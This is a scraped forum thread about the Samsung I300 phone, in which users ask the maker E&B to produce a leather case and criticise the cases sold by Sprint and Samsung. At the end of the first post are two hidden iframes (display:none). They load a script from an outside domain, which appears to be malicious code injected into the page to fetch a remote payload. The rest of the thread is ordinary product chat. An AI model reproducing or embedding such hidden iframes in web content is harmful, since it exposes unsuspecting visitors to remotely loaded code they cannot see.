+ Reply to Thread

Leather Case for I300

Hey everyone!

Have a small request if you haven't done it already.... Would anyone who is interested in having a leather case for the I300 made by E&B company please email Michelle B by clicking on the email link at http://www.ebcases.com/Page.bok?template=ComingSoon Michelle says she has not received many emails requesting a case for the I300 and this is what they use to determine if they should make a case for a particular device.

We all know the included case with the I300 is not that great and I personally own the one Sprint sells for the I300 and that case is a total joke (for stater's, the phone rides sideways in this case making the top LCD useless). You can see what I and a couple of other users think of the case by reading this thread at pdabuzz.com:

http://www2.pdabuzz.com/Forums/showt...threadid=25949

In short, don't order that case from Sprint...it is a total waste of your money!

If you have ever owned a case from E&B you know what high quality, functional cases they make so please email Michelle so we can have a good case for this great phone!

Marty<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

great idea of posting this !

i emailed her last week and got the "need more people to email me" reply. im sure they wiil make a case for it.. it just WHEN they will...

also, be sure and give her your opinions on how it should be made...

Thumbs up

This may be an unpopular opinion, but I like the case sold by sprint.

The traditional phone cases have bothered me because everytime I sit in my car the antenna always pokes me in the side. This case is mounted sideways on the belt and is bearly noticable when sitting down.

I do agree that the LCD panel on the top is a little difficult to see and you need to turn the phone upward to yourself to view the panel, but for the 2 - 3 calls I get a day it does not seem to be a problem.

Overall I give the case a Thumb up! I guess we all have our preferences.

Russ

I too sent an email for their "numbers". I also sent a copy of the i-300 page to VAJA cases in argentina. They made my 505 case and I really liked it.

Leather Case

I just emailed her. Also, after looking at the site, the Copilot 40 looks like it might work.

Cases

I emailed Michelle as well a couple of days ago. I have both the Samsung leather pouch, and the sideways pouch from Sprint. Neither really fits the bill. First of all, I usually carry my phone in my pocket, so I don't care about seeing the top LCD just by looking down.

However, there are a few things about the Sprint case that work well for me. For starters, the case is actually padded, unlike the Samsung one. This prevents me from accidentally hitting the voice dial button, or any of the side buttons that activate the unit.

What it doesn't do well is give me access to the hands free input on the phone. All in all, I like this one better.

The snakeskin leather one from Samsung is worse for me because it does a few things badly. For starters, I hate the protruding belt clip part. Of course, for those who like wearing the phone on their belt, the swivel on it is perfect. Secondly, the fit is so snug, that I have a hard time getting the phone out when I need to use it.

So, E&B needs to hurry up!!!

Rob